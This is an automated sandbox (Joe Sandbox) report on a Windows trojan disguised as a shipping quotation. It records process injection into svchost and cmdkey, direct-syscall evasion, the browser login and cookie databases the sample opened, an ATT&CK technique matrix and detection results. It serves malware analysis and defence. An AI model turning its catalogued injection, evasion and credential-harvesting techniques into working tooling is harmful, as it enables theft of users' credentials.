              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCB20 mov eax, dword ptr fs:[00000030h]1_2_039BCB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04B67 mov eax, dword ptr fs:[00000030h]1_2_03A04B67
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936B70 mov eax, dword ptr fs:[00000030h]1_2_03936B70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936B70 mov eax, dword ptr fs:[00000030h]1_2_03936B70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936B70 mov eax, dword ptr fs:[00000030h]1_2_03936B70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E6B77 mov eax, dword ptr fs:[00000030h]1_2_039E6B77
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964B79 mov eax, dword ptr fs:[00000030h]1_2_03964B79
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E6A80 mov eax, dword ptr fs:[00000030h]1_2_039E6A80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04AE8 mov eax, dword ptr fs:[00000030h]1_2_03A04AE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940ACE mov eax, dword ptr fs:[00000030h]1_2_03940ACE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940ACE mov eax, dword ptr fs:[00000030h]1_2_03940ACE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4AC2 mov eax, dword ptr fs:[00000030h]1_2_039D4AC2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0AFF mov eax, dword ptr fs:[00000030h]1_2_039B0AFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0AFF mov eax, dword ptr fs:[00000030h]1_2_039B0AFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0AFF mov eax, dword ptr fs:[00000030h]1_2_039B0AFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D0AE0 mov eax, dword ptr fs:[00000030h]1_2_039D0AE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2AE0 mov eax, dword ptr fs:[00000030h]1_2_039D2AE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2AE0 mov eax, dword ptr fs:[00000030h]1_2_039D2AE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950AEB mov eax, dword ptr fs:[00000030h]1_2_03950AEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950AEB mov eax, dword ptr fs:[00000030h]1_2_03950AEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950AEB mov eax, dword ptr fs:[00000030h]1_2_03950AEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AED mov eax, dword ptr fs:[00000030h]1_2_03930AED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AED mov eax, dword ptr fs:[00000030h]1_2_03930AED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AED mov eax, dword ptr fs:[00000030h]1_2_03930AED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AA0E mov eax, dword ptr fs:[00000030h]1_2_0396AA0E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AA0E mov eax, dword ptr fs:[00000030h]1_2_0396AA0E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4A57 mov eax, dword ptr fs:[00000030h]1_2_039B4A57
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4A57 mov eax, dword ptr fs:[00000030h]1_2_039B4A57
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EA40 mov eax, dword ptr fs:[00000030h]1_2_0395EA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EA40 mov eax, dword ptr fs:[00000030h]1_2_0395EA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039CAA40 mov eax, dword ptr fs:[00000030h]1_2_039CAA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039CAA40 mov eax, dword ptr fs:[00000030h]1_2_039CAA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C98F mov eax, dword ptr fs:[00000030h]1_2_0396C98F
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_00690B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_00662622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_0065083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_006509D5 SetUnhandledExceptionFilter
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_00650C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtClose: Direct from: 0x7FFC7D729E7F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x3474215
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x347EAA4
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x347D421
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x62FAAF8
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDeviceIoControlFile: Direct from: 0x3476442
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtQuerySystemInformation: Direct from: 0x347D4BD
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x3475662
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDeviceIoControlFile: Direct from: 0x347D614
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x3476386
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtCreateThreadEx: Direct from: 0x3474A5F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtQueryInformationToken: Direct from: 0x3475DBF
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x62F2D9D
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDeviceIoControlFile: Direct from: 0x347D56C
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDeviceIoControlFile: Direct from: 0x3476471
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtResumeThread: Direct from: 0x62F2FCF
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtClose: Direct from: 0x347D6B2
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x62F2F5E
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDeviceIoControlFile: Direct from: 0x34764B5
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x7FFCB3EA2651
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
              Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\cmdkey.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 7540
              Source: C:\Windows\SysWOW64\cmdkey.exe | Thread register set: target process: 7540
              Source: C:\Windows\SysWOW64\cmdkey.exe | Thread register set: target process: 7964
              Source: C:\Windows\SysWOW64\svchost.exe | Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2FE1008
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_00691201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_00672BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_0069B226 SendInput,keybd_event
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_006B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
              Source: C:\Windows\SysWOW64\cmdkey.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_00690B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_00691663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
              Source: QUOTATION#070125-ELITE MARINE .exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: QUOTATION#070125-ELITE MARINE .exe, RAVCpl64.exe, 00000002.00000002.16200672767.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.11663489590.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
              Source: RAVCpl64.exe, 00000002.00000002.16200672767.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.11663489590.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
              Source: RAVCpl64.exe, 00000002.00000002.16200672767.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.11663489590.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
              Source: RAVCpl64.exe, 00000002.00000002.16200672767.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.11663489590.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ~Program Manager!
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_00650698 cpuid
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_006A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_0068D27A GetUserNameW
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_0066B952 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_006342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

              Stealing of Sensitive Information

              Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\cmdkey.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\cmdkey.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
              Source: QUOTATION#070125-ELITE MARINE .exe | Binary or memory string: WIN_81
              Source: QUOTATION#070125-ELITE MARINE .exe | Binary or memory string: WIN_XP
              Source: QUOTATION#070125-ELITE MARINE .exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: QUOTATION#070125-ELITE MARINE .exe | Binary or memory string: WIN_XPe
              Source: QUOTATION#070125-ELITE MARINE .exe | Binary or memory string: WIN_VISTA
              Source: QUOTATION#070125-ELITE MARINE .exe | Binary or memory string: WIN_7
              Source: QUOTATION#070125-ELITE MARINE .exe | Binary or memory string: WIN_8

              Remote Access Functionality

              Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_006B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe | Code function: 0_2_006B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 241 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 12 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Figure: Behavior graph, ID 1586802. Sample: QUOTATION#070125-ELITE MAR..., start date: 09/01/2025, architecture: WINDOWS, score: 100. Process chain: QUOTATION#070125-ELITE MARINE .exe -> svchost.exe -> RAVCpl64.exe (injected) -> cmdkey.exe -> firefox.exe.]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| QUOTATION#070125-ELITE MARINE .exe | 61% | ReversingLabs | Win32.Trojan.AutoitInject | |
| QUOTATION#070125-ELITE MARINE .exe | 100% | Avira | DR/AutoIt.Gen8 | |
| QUOTATION#070125-ELITE MARINE .exe | 100% | Joe Sandbox ML | | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ac.ecosia.org/autocomplete?q=cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://static.loopia.se/responsive/images/iOS-57.pngRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkinRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736437877.0005169428&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYRAVCpl64.exe, 00000002.00000002.16214552888.0000000006C56000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.00000000042C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://gemini.google.com/app?q=cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1586802
Start date and time: 2025-01-09 16:44:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: QUOTATION#070125-ELITE MARINE .exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@18/12
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 53
• Number of non-executed functions: 310
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): WerFault.exe, svchost.exe
